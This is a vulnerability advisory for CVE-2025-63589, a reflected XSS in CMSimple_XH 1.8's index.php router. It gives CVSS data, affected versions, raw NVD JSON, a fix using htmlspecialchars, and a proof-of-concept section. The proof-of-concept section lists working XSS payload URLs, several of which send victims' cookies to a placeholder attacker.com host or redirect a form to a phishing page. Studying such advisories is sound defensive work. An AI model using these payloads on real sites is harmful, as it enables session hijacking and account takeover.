CVE-2025-63589

Description

A reflected XSS vulnerability exists in CMSimple_XH 1.8's index.php router when attacker-controlled path segments are not sanitized or encoded before being inserted into the generated HTML (navigation links, breadcrumbs, search form action, footer links). An attacker-controlled string placed in the URL path is reflected into multiple HTML elements, allowing execution of arbitrary JavaScript in victims' browsers visiting a crafted URL.

CVSS Details

CVSS Score

7.1

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:cmsimple-xh:cmsimple_xh:1.8.0:-:*:*:*:*:*:* - VULNERABLE

CMSimple_XH 1.8.x < 1.8.1 (if patched)

CMSimple_XH 1.8.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

<!-- CVE-2025-63589 PoC - Reflected XSS in CMSimple_XH 1.8 -->
<!-- Attack URL: Trigger XSS via URL path reflection -->
<!-- This PoC demonstrates the vulnerability by injecting JavaScript into page navigation elements -->

<!-- Basic XSS Payload -->
<!-- http://target.com/index.php/<script>alert('XSS')</script> -->

<!-- Cookie Theft Payload -->
<!-- http://target.com/index.php/<script>document.location='https://attacker.com/steal?c='+document.cookie</script> -->

<!-- Session Hijacking Payload -->
<!-- http://target.com/index.php/<img src=x onerror="fetch('https://attacker.com/log?cookie='+document.cookie)"> -->

<!-- Bypass Sanitization Payload -->
<!-- http://target.com/index.php/"><script>alert(document.domain)</script> -->

<!-- Real-world Attack Scenario -->
<!-- Attacker creates a malicious link and tricks authenticated admin into clicking -->
<!-- http://vulnerable-site.com/index.php/<script>fetch('/admin/settings?cmd=exec',{credentials:'include'})</script> -->

<!-- HTML Injection via Navigation -->
<!-- http://target.com/index.php/"><a href="javascript:alert(1)">Click Me</a> -->

<!-- Stored XSS Preparation via Search Form -->
<!-- http://target.com/index.php/<script>document.forms[0].action='https://attacker.com/phish'</script> -->

<!-- Example of how the vulnerable code might look (vulnerable index.php excerpt) -->
/*
VULNERABLE CODE EXAMPLE:

$path_segment = $_SERVER['REQUEST_URI'];  // User input from URL
$nav_html = '<a href="/' . $path_segment . '">Navigation</a>';  // Direct concatenation
$breadcrumbs = '<span>' . $path_segment . '</span>';  // No encoding
$search_action = '<form action="/search' . $path_segment . '">';  // Direct use

echo $nav_html;
echo $breadcrumbs;
echo $search_action;

FIXED CODE EXAMPLE:

$path_segment = htmlspecialchars($_SERVER['REQUEST_URI'], ENT_QUOTES, 'UTF-8');
$nav_html = '<a href="/' . $path_segment . '">Navigation</a>';
$breadcrumbs = '<span>' . $path_segment . '</span>';
$search_action = '<form action="/search">';

echo $nav_html;
echo $breadcrumbs;
echo $search_action;
*/

<!-- Mitigation: Apply HTML encoding to all user-controllable output -->
<!-- Use: htmlspecialchars($input, ENT_QUOTES, 'UTF-8') before output -->

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-63589
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-63589
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-63589/
[4] VulDB https://vuldb.com/cve/CVE-2025-63589
[5] https://github.com/cmsimple-xh/cmsimple-xh/blob/master/index.php
[6] https://github.com/cybercrewinc/CVE-2025-63589
[7] https://github.com/cybercrewinc/CVE-2025-63589

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-63589", "sourceIdentifier": "[email protected]", "published": "2025-11-06T17:15:46.343", "lastModified": "2025-11-10T17:29:33.603", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A reflected XSS vulnerability exists in CMSimple_XH 1.8's index.php router when attacker-controlled path segments are not sanitized or encoded before being inserted into the generated HTML (navigation links, breadcrumbs, search form action, footer links). An attacker-controlled string placed in the URL path is reflected into multiple HTML elements, allowing execution of arbitrary JavaScript in victims' browsers visiting a crafted URL."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 4.2}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:cmsimple-xh:cmsimple_xh:1.8.0:-:*:*:*:*:*:*", "matchCriteriaId": "C01EAAD5-77D7-462E-B9AF-7183345844F9"}]}]}], "references": [{"url": "https://github.com/cmsimple-xh/cmsimple-xh/blob/master/index.php", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/cybercrewinc/CVE-2025-63589", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/cybercrewinc/CVE-2025-63589", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}]}}